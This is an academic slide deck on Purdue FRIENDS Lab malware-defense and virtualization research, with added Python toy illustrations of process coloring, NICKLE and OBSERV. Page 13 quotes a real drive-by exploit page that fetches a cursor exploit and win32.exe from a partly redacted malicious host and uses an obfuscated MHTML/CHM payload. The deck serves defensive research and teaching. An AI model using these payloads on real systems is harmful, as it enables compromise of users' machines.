Research at FRIENDS Lab http://friends.cs.purdue.edu Dongyan Xu Associate Professor Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University


Page 1: Research at FRIENDS Lab friends.cs.purdue Dongyan Xu Associate Professor

Research at FRIENDS Lab
http://friends.cs.purdue.edu

Dongyan Xu, Associate Professor
Department of Computer Science and
Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University

Page 2: Research Overview

Virtual Infrastructures
• VIOLIN virtual infrastructure
• Infrastructure adaptation
• Infrastructure snapshot
• Real-world deployment (http://www.nanohub.org)

Malware Defense
• Honeyfarm (Collapsar)
• Playground (vGround)
• VM introspection (OBSERV)
• OS info. flow (Proc. Coloring)
• Kernel rootkit (NICKLE)
• Reverse engr. (AutoFormat)

Underlying layer: Virtualization Technology (Xen, QEMU, VirtualBox, KVM, VMware)

Page 3: Project 1: Process Coloring: Information Flow-based Malware Defense

Funded by IARPA through AFRL

One-sentence summary: propagating and logging provenance information (“colors”) along OS-level information flows for malware detection and sensitive data protection

Prototype integration with Southwest Research Institute

Demo CD completed today!

Page 4: PC Usage Scenario: Server-Side Malware Defense

[Figure labels: init, rc, s30sendmail, s45named, s55sshd, s80httpd (initial coloring); httpd, /bin/sh, wget, Rootkit, netcat, local files, /etc/shadow, confidential info (coloring diffusion); syscall log.]

Capability 1: PC malware alert (“No shell process should have the color of Apache”)

Capability 2: Color-based identification of malware break-in point

Capability 3: Color-based log partition for contamination analysis

Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html

Page 5: PC Usage Scenario: Client-Side Malware Defense

[Figure labels: firefox (Web Browser), turbotax (Tax), notepad (Editor), warcraft (Games); Agobot and www.malicious.net; tax files.]

PC malware alert (“Web browser and tax colors should never mix”)

Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi
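The two alert rules on the server-side and client-side slides, as an added example that is not the FRIENDS Lab code: a toy Python replay of a constructed syscall log that diffuses colors across fork/exec/read/write (the "coloring diffusion" of the figure), raises the server-side and client-side alerts (Capability 1), locates a break-in point (Capability 2) and partitions the log by color (Capability 3). Every pid, program name, path and initial color below is made up for the illustration.

```python
import os
from collections import defaultdict

# Constructed initial state for a toy model of Process Coloring (not the FRIENDS Lab code):
# selected daemons/clients and sensitive files start out with a color.
INITIAL_PROCS = {
    100: ("init", set()),
    200: ("httpd", {"apache"}),
    300: ("firefox", {"web"}),
    400: ("turbotax", {"tax"}),
}
INITIAL_FILES = {
    "/home/alice/tax/2007.tax": {"tax"},
    "/etc/shadow": {"confidential"},
}

# Constructed syscall log: (seq, syscall, pid, argument). The argument is the child pid
# for fork, the program path for exec, and the file path for read/write.
SYSCALL_LOG = [
    (1, "read", 400, "/home/alice/tax/2007.tax"),   # TurboTax opens its own file: fine
    (2, "fork", 200, 201),                           # httpd forks after a request...
    (3, "exec", 201, "/bin/sh"),                     # ...and the child turns into a shell
    (4, "fork", 201, 202),
    (5, "exec", 202, "/usr/bin/wget"),
    (6, "write", 202, "/tmp/rootkit"),               # a downloaded payload lands on disk
    (7, "read", 200, "/var/www/index.html"),         # ordinary httpd activity
    (8, "fork", 300, 301),                           # the browser spawns a child...
    (9, "exec", 301, "/tmp/agobot"),                 # ...which is a bot
    (10, "read", 301, "/home/alice/tax/2007.tax"),   # the bot reads the tax file
    (11, "write", 301, "/tmp/exfil.dat"),            # and stages it for exfiltration
]

SHELLS = {"sh", "bash", "dash"}


def replay(log=SYSCALL_LOG, procs0=INITIAL_PROCS, files0=INITIAL_FILES):
    """Diffuse colors along fork/exec/read/write and partition the log by color.

    Returns (procs, files, acquired_at, partitions):
      procs       pid  -> (program name, set of colors)
      files       path -> set of colors
      acquired_at (pid or path, color) -> seq of the event that first brought the color there
      partitions  color -> list of log entries that involved an entity carrying that color
    """
    procs = {pid: (name, set(c)) for pid, (name, c) in procs0.items()}
    files = {path: set(c) for path, c in files0.items()}
    acquired_at = {}
    partitions = defaultdict(list)

    def taint(colors, new, key, seq):
        for c in new:
            if c not in colors:
                colors.add(c)
                acquired_at[(key, c)] = seq

    for entry in log:
        seq, call, pid, arg = entry
        name, colors = procs[pid]
        if call == "fork":            # the child inherits the parent's colors
            procs[arg] = (name, set())
            taint(procs[arg][1], colors, arg, seq)
        elif call == "exec":          # new program image, same colors
            procs[pid] = (os.path.basename(arg), colors)
        elif call == "read":          # file colors flow into the reader
            taint(colors, files.get(arg, set()), pid, seq)
        elif call == "write":         # process colors flow into the file
            taint(files.setdefault(arg, set()), colors, arg, seq)
        # Capability 3: each color's partition keeps the events that involve it.
        touched = set(procs[pid][1])
        if call == "fork":
            touched |= procs[arg][1]
        elif call in ("read", "write"):
            touched |= files.get(arg, set())
        for c in touched:
            partitions[c].append(entry)
    return procs, files, acquired_at, dict(partitions)


def server_side_alerts(procs):
    """Capability 1: 'No shell process should have the color of Apache'."""
    return sorted(pid for pid, (name, colors) in procs.items()
                  if name in SHELLS and "apache" in colors)


def client_side_alerts(procs, files):
    """'Web browser and tax colors should never mix', checked on processes and on files."""
    bad_procs = sorted(pid for pid, (_, c) in procs.items() if {"web", "tax"} <= c)
    bad_files = sorted(path for path, c in files.items() if {"web", "tax"} <= c)
    return bad_procs, bad_files


def break_in_point(acquired_at, color):
    """Capability 2: the earliest event that carried `color` onto something that did not start with it."""
    hits = [(seq, key) for (key, c), seq in acquired_at.items() if c == color]
    return min(hits, key=lambda h: h[0]) if hits else None


if __name__ == "__main__":
    procs, files, acquired_at, partitions = replay()
    print("server-side alerts (pids):", server_side_alerts(procs))
    print("client-side alerts:", client_side_alerts(procs, files))
    print("apache break-in point (seq, entity):", break_in_point(acquired_at, "apache"))
    for color, entries in sorted(partitions.items()):
        print(color, "partition:", [e[0] for e in entries])
```

The replay is deliberately coarse (whole-process taint, no declassification), which is why the `/tmp/exfil.dat` file ends up flagged as well as the bot process; the apache partition is exactly the slice of the log an analyst would pull for contamination analysis, and its first entry is the fork out of httpd.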

Page 6: Project 2: Strategic Defense against Kernel Rootkit Attacks

Kernel rootkits: stealthy and foundational threat to cyberspace

Current defense:
• Symptom-based detection
• Disruption to production system
• Manual forensics

Strategic defense:
• Proactive indication before attack
• Automatic avoidance by “steering away” production system (non-stop operation)
• Live forensics for future protection

Page 7: Integrated Defense Scenario

[Figure: a Production VM (Guest OS on a VMM) runs with Kernel Guarding Code and a Rootkit Profile. Right before the attack, Indication fires and the VM is forked. After threat indication, the Production VM continues under Avoidance while a Forensics VM carries out Forensics and Clean-up.]

Page 8: Results with Real-World Kernel Rootkits

Indicating and preventing kernel rootkit attacks at VMM level

[RAID08 Best Paper Award]

Page 9: Thank you!

For more information:
URL: http://friends.cs.purdue.edu (on a VM)
Google: “Purdue virtualization friends”
Email: [email protected]

Page 10: NICKLE: Kernel Rootkit Indicator

NICKLE: “No Instruction Creeping into Kernel Level Executed”

[Figure: Guest OS kernel code above a VMM that holds both a standard memory and a shadow memory; NICKLE lives in the VMM.]

Step 1: Create two memory spaces: standard memory and shadow memory
Step 2: Authenticate and copy kernel code to shadow memory
Step 3: Memory access dispatch: kernel code fetch -> shadow memory; all other accesses -> standard memory
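The three steps above, as an added example that is not NICKLE's own code: a toy Python VMM with a standard and a shadow memory, a hash manifest standing in for kernel-code authentication, and a fetch dispatcher that serves kernel-mode instruction fetches from the shadow copy only. The page sizes, the "kernel image" bytes, the manifest and the simulated writes into kernel memory are all constructed for the illustration.

```python
import hashlib

# Toy memory model (constructed, not NICKLE's real implementation): four 16-byte pages.
PAGE = 16
KERNEL_TEXT_PAGES = (0, 1)          # pages holding kernel code
KERNEL_DATA_PAGE = 2                # writable kernel data
USER_PAGE = 3                       # a user-space program lives here

# Constructed "kernel image" and the trusted hash manifest that step 2 authenticates against.
TRUSTED_TEXT = bytes(range(0x10, 0x10 + len(KERNEL_TEXT_PAGES) * PAGE))
MANIFEST = {
    p: hashlib.sha256(TRUSTED_TEXT[p * PAGE:(p + 1) * PAGE]).hexdigest()
    for p in KERNEL_TEXT_PAGES
}


class NickleVMM:
    """Step 1: a standard memory (what the guest sees) and a VMM-private shadow memory."""

    def __init__(self, size=4 * PAGE):
        self.standard = bytearray(size)
        self.shadow = bytearray(size)
        self.alerts = []  # (address, reason) for every suspicious kernel-mode fetch

    # Ordinary guest data accesses are served from standard memory.
    def guest_write(self, addr, data):
        self.standard[addr:addr + len(data)] = data

    def guest_read(self, addr, length):
        return bytes(self.standard[addr:addr + length])

    def authenticate_kernel_code(self, manifest=MANIFEST):
        """Step 2: copy into shadow memory only the pages whose hash matches the manifest."""
        accepted = []
        for page, digest in manifest.items():
            lo, hi = page * PAGE, (page + 1) * PAGE
            chunk = bytes(self.standard[lo:hi])
            if hashlib.sha256(chunk).hexdigest() == digest:
                self.shadow[lo:hi] = chunk
                accepted.append(page)
        return accepted

    def fetch(self, addr, length, kernel_mode):
        """Step 3: dispatch. User-mode fetches read standard memory; kernel-mode fetches
        read shadow memory, so bytes that were never authenticated cannot execute."""
        if not kernel_mode:
            return self.guest_read(addr, length)
        shadow = bytes(self.shadow[addr:addr + length])
        standard = bytes(self.standard[addr:addr + length])
        if shadow != standard:  # the indicator: the guest is about to run unauthenticated bytes
            reason = "unauthenticated code" if shadow == bytes(length) else "tampered kernel code"
            self.alerts.append((addr, reason))
        return shadow


def run_scenario():
    """Boot, authenticate, then simulate the kinds of kernel-memory writes a rootkit makes."""
    vmm = NickleVMM()
    vmm.guest_write(0, TRUSTED_TEXT)                        # boot loader places the kernel text
    accepted = vmm.authenticate_kernel_code()               # step 2 fills the shadow copy
    clean = vmm.fetch(0, 4, kernel_mode=True)               # normal kernel execution
    vmm.guest_write(USER_PAGE * PAGE, b"\xb8\x01")          # a user program is loaded...
    user = vmm.fetch(USER_PAGE * PAGE, 2, kernel_mode=False)  # ...and runs from standard memory
    vmm.guest_write(KERNEL_DATA_PAGE * PAGE, b"\x90" * 4)   # code dropped into a kernel data page
    vmm.guest_write(PAGE, b"\xcc\xcc")                      # trusted kernel text patched in place
    injected = vmm.fetch(KERNEL_DATA_PAGE * PAGE, 4, kernel_mode=True)
    patched = vmm.fetch(PAGE, 2, kernel_mode=True)
    data_view = vmm.guest_read(KERNEL_DATA_PAGE * PAGE, 4)  # data reads still see the bytes
    return {
        "accepted": accepted,
        "clean": clean,
        "user": user,
        "injected": injected,      # zeros: the dropped code never reaches the CPU
        "patched": patched,        # the authenticated original bytes, not the patch
        "data_view": data_view,
        "alerts": vmm.alerts,
    }


def authenticate_tampered_image():
    """Step 2 rejects a page whose contents do not match the manifest."""
    vmm = NickleVMM()
    vmm.guest_write(0, TRUSTED_TEXT[:-1] + b"\xff")         # last byte of page 1 altered
    return vmm.authenticate_kernel_code()


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
    print("pages accepted from a tampered image:", authenticate_tampered_image())
```

The two alert reasons correspond to the two ways unauthenticated code reaches kernel mode: a fetch from an address the shadow never held (shadow bytes still zero) and a fetch from authenticated text whose standard-memory copy has since been altered. In both cases the CPU is handed the shadow bytes, which is what makes the defense "steer away" rather than merely detect.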

Page 11: Collapsar Honeyfarm

[Figure: Redirectors in Domain A, Domain B and Domain C forward traffic to the Collapsar Center, whose Front-End feeds the VM-based Honeypots; a Management Station and a Correlation Engine sit beside them.]

Benefit 1: Centralized management of honeypots w/ distributed presence
Benefit 2: Off-site attack occurrence
Benefit 3: Convenience for real-time attack correlation and log mining

[USENIX Security’04]

Page 12: Collapsar as a Client-side Honeyfarm

[Figure: Redirectors in Domain A, Domain B and Domain C, the Collapsar Center Front-End and the VM-based Honeypots, which now reach out to a Malicious Web Server.]

Active Honeypots w/ Vulnerable Client-side Software
• Web Browsers (e.g., IE, Firefox, …)
• Email Clients (e.g., Outlook, …)

[HoneyMonkey, NDSS’06]
PlanetLab (310 sites): 288 malicious sites / 2 zero-day exploits

Page 13: Upon Clicking a Malicious URL

URL: http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html

22 unwanted programs installed without user’s consent!

MS04-013, MS03-011, MS05-002

<html><head><title></title></head><body>

<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>

<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>

try{document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58;//C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>

</body></html>

A Real Incident [JPDC’06]

Page 14: vGround: A Virtual Worm Playground (demo)

dallas.cs.purdue.edu

• High fidelity: VM (full-system virtualization)
• Strict confinement: VN (link-layer network virtualization)
• Easy deployment: locally deployable
• Efficient experiments: image generation time 60 seconds, boot-strap time 90 seconds, tear-down time 10 seconds

A Worm Playground: in “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004

[RAID’05]

Page 15: OBSERV: “Out-of-the-Box” Malware Detection

State-of-the-art malware defense: running anti-malware software inside the monitored system
• Advantage: they can see everything (e.g., files, processes…)
• Disadvantage: they may not see anything!

[Figure: VirusScan, Firefox and IE all running on top of the OS Kernel.]

Page 16: Why “Out-of-the-Box”?

Current approach fundamentally flawed:
• Anti-malware software and protected software running at the same privilege level
• Lack of root-of-trust

Solution: going “out-of-the-box”

[Figure: Firefox and IE on the OS Kernel inside the VM; VirusScan moved outside, onto the Virtual Machine Monitor (VMM).]

Page 17: The “Semantic-Gap” Challenge

What we can observe:
• Low-level states: memory pages, disk blocks…
• Low-level events: privileged instructions, interrupts, I/O…

What we want to observe:
• High-level semantic states: files, processes…
• High-level semantic events: system calls, context switches…

[Figure: the Semantic Gap lies between the Guest OS and VirusScan running on the Virtual Machine Monitor (e.g., VMware, Xen).]

Page 18: Our Solution: OBSERV

OBSERV: “Out-of-the-Box” with SEmantically Reconstructed View, a new mechanism missing in existing VMMs

[Figure: Firefox and IE on the OS Kernel; OBSERV added to the Virtual Machine Monitor (VMM).]

[ACM CCS’07]

Page 19: New Capabilities Enabled by OBSERV

Capability I: Invisible system logging
Capability II: Malware detection by view comparison (OBSERV view vs. inside-the-box view; view diff)
Capability III: External run of COTS anti-malware software

[Figure: Firefox and IE on the OS Kernel; OBSERV in the Virtual Machine Monitor (VMM) produces the OBSERV View, which is diffed against the Inside-the-box View.]
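Capability II (malware detection by view comparison) and the semantic-gap bridging it depends on, as an added example that is not OBSERV's code: a toy Python reconstruction of a process list from raw guest memory (using a constructed, simplified task layout, not a real kernel's task_struct), compared against a constructed in-the-box `ps` listing in which one process has been hidden. The task layout, the init_task address, the process table and the `ps` lines are all made up for the illustration.

```python
import struct

# Constructed task layout for a toy guest kernel (not a real kernel's task_struct):
#   u32 pid | 16-byte NUL-padded comm | u32 next (guest address of the next task)
TASK_FMT = "<I16sI"
TASK_SIZE = struct.calcsize(TASK_FMT)   # 24 bytes
INIT_TASK_ADDR = 0x100                   # the "init_task" symbol: where the list starts

# Constructed guest state: what is really running, and what `ps` inside the guest
# reports after a rootkit hid pid 1337 from the in-the-box view.
GUEST_TASKS = [(1, "init"), (312, "sshd"), (901, "firefox"), (1337, "agobot")]
INSIDE_PS_OUTPUT = [
    "  PID COMMAND",
    "    1 init",
    "  312 sshd",
    "  901 firefox",
]


def build_guest_memory(tasks=GUEST_TASKS, base=INIT_TASK_ADDR, size=0x400):
    """Lay the tasks out in a raw memory image as a circular singly linked list."""
    mem = bytearray(size)
    addrs = [base + i * TASK_SIZE for i in range(len(tasks))]
    for i, (pid, comm) in enumerate(tasks):
        nxt = addrs[(i + 1) % len(tasks)]
        struct.pack_into(TASK_FMT, mem, addrs[i], pid, comm.encode(), nxt)
    return mem


def reconstruct_process_view(mem, init=INIT_TASK_ADDR, limit=4096):
    """Bridge the semantic gap: turn memory bytes into {pid: comm} by walking the task list.

    The walk is bounded so that a corrupted or deliberately cyclic list cannot hang the monitor.
    """
    view, addr = {}, init
    for _ in range(limit):
        pid, comm, nxt = struct.unpack_from(TASK_FMT, mem, addr)
        view[pid] = comm.rstrip(b"\0").decode()
        addr = nxt
        if addr == init:
            return view
    raise ValueError("task list never returned to init_task: corrupt or hostile memory")


def parse_ps_output(lines):
    """The inside-the-box view, as the guest's own tools report it."""
    view = {}
    for line in lines[1:]:             # skip the header row
        pid, comm = line.split(None, 1)
        view[int(pid)] = comm.strip()
    return view


def view_diff(outside, inside):
    """Capability II: anything present outside but missing inside has been hidden;
    anything reported inside but absent outside is a ghost the guest is lying about."""
    hidden = {pid: outside[pid] for pid in outside.keys() - inside.keys()}
    ghosts = {pid: inside[pid] for pid in inside.keys() - outside.keys()}
    return hidden, ghosts


if __name__ == "__main__":
    outside = reconstruct_process_view(build_guest_memory())
    inside = parse_ps_output(INSIDE_PS_OUTPUT)
    hidden, ghosts = view_diff(outside, inside)
    print("OBSERV view:       ", outside)
    print("inside-the-box view:", inside)
    print("hidden processes:  ", hidden)
```

The reconstruction relies on two things the real OBSERV obtains from the guest kernel's symbols and data-structure definitions: where the list starts and how each entry is laid out. In this toy both are constants; in practice they come from the guest kernel's symbol table and must match its exact version.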

Page 20: AutoFormat: Malware Protocol Reverse Engineering

Given malware binary, infer malware protocol format

[NDSS’08]

Page 21: Inferring Slapper Worm (Botnet) Protocol

[Figure: an inferred message format annotated with a nested data structure declaration and a compiler-inserted gap; numbered annotations 1, 2, 3 and 1, 2.]

Page 22: VIOLIN: Portable, Adaptive Virtual Environments

Adaptive Virtual Environments on a shared hosting infrastructure

[Figure: virtual environments with DB nodes connected over the Internet.]

[TR’03, IEEE Computer’05]

Page 23: Adaptation Architecture and Sample Scenario (Demo)

[Figure: VMs on several VMMs connected through VIOLIN Switches over the Physical Network; a Monitoring Daemon on each host reports to the Adaptation Manager, which triggers Scale Up, CPU Update and Migrate actions.]

[IEEE ICAC’06]

Page 24: Live VIOLIN Snapshot (Demo)

Useful for application- and OS-transparent recovery from:
• Crashes, failures, and disasters
• Unexpected power/network outage
And for VIOLIN replay

[Figure: Snapshot taken at one hosting center, Resume at another hosting center.]

[ACM/IEEE VTDC’07]